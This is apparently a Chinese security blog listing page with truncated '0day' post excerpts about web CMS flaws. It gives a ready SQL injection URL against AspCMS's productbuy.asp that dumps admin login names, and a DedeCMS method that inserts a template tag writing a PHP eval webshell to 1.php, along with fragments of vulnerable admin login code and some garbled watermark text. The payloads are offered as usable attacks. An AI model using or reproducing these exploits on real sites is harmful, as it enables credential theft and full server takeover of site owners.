aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且
支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
漏洞文件:/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名EXP:
http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID...
0day, 漏洞阅读全文
aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID=1的账...
0day, 漏洞阅读全文
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
www.t00ls.net5 G$ w& h” m! n9 S: G
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) O+ I’ L2 I% Y) E: ...
0day, 漏洞阅读全文
这是一套破系统,拿人家源马改改就说是自己的,还收费
垃圾系统,还对源马进行了加密。
漏洞一大堆
后台登录验证文件:
<!–#include file=”conn.asp”–>
<!–#include file=”../class/Config.asp”–>
<!–#include file=”inc/md5.asp”–>
<!–#include file=”../class/Ubbsql.asp”–>
<%
dim sql,rs
dim username,password,CheckCode
username=replace(trim(request(“username”)),”‘”,”")
password=replace(trim(Request(...
0day, 漏洞阅读全文
<!–p session_start(); include “../include/databaseConfig.inc.php”; $admin = $_POST['admin']; $pass = md5($_POST['pass']); $codes = $_POST['codes']; if($_GET['action']){ //这里开始错误! /* if($result=$d–>Execute(“select * from x_admin where a_admin=’”.$admin.”‘”)){ if($rs=mysql_fetch_object($result)){ if($rs->a_pws==$pass){ if($codes!=$_SESSION['code']){ unset($_SESSION['code']); echo “<script type=”text/javascript”>...
0day阅读全文











最新评论
看看了 貌似很实用